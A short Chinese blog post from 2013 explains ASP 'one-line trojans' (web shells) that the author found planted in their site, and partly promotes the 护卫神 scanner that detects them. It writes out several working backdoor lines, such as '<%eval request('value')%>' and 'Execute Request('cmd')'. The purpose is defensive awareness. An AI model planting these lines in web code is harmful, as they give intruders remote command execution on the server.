欢迎访问web记录!每一步的成长都是一种幸福,聪明的女孩擅长记录幸福!
您现在的位置:web记录 > 网站运营 > 网站安全 >

关于一句话木马

更新时间:2013-07-24 浏览次数:
最新网站频繁被挂黑链,总是反反复复的删,一开始也没太在意,直到把服务器拖跨了,太发现其严重性。用护卫神云查杀系统检测后才发现有一种叫“一句话木马”的东西,潜伏在网页中。
 
一句话木马是很简短的木马,核心代码就只有一句,但其破坏力非常大,如:
 
Execute Session('cmd')
Execute Request('cmd')
Eval Session('cmd')
Eval Request('cmd')
<%execute request('value')%>
<%eval request('value')%>
<%execute(request(chr(112)))%>
 
原理:通过execute或函数,将传递进去的内容作为脚本运行。一般一句木马都带有一个客户端接口,留下这个接口的非法用户,只要找到这个接口,通过发送不同的命令,就能执行不同的功能,比如删除文件,挂马等为所欲为的操作,这样对网站以及服务器产生了不可预知的破坏。光一句话木马核心代码本身没有任何破坏力,主要在于传递给这句话的参数内容。
 
目前,部分用户的网站可能不是自己开发的,而是从网上下载下来修改下前台界面就放到了网络服务器上。却不知这些程序中早已被人留下了后门,其中后门之一就是一句话木马。
 
基于一句话木马的特征,可以是单个文件,可以是影藏在正常的文件中,插入这一句话即可。比如一般的Md5函数文件,让用户防不胜防。
 
就目前而言,几乎所有的杀毒软件都无法查杀一句话木马。为了解决一句话木马查杀难题,护卫神对算法进行了多次调整,最终能彻底准确查杀一句话木马,让一句话木马不再有藏身之地。
因此,如果您发现您的某个“正常”文件被护卫神查杀隔离了,请检查该文件,是否含有上述的一句话木马特征,如果有,则清除之,恢复即可。这样,就保证了您网站的安全,也保证了服务器的安全,让您不再担心被破坏的危险。
 
关键词:

    + 相关信息

    前端案例

    返回顶部 欢迎访问web记录!每一步的成长都是一种幸福,聪明的女孩擅长记录幸福!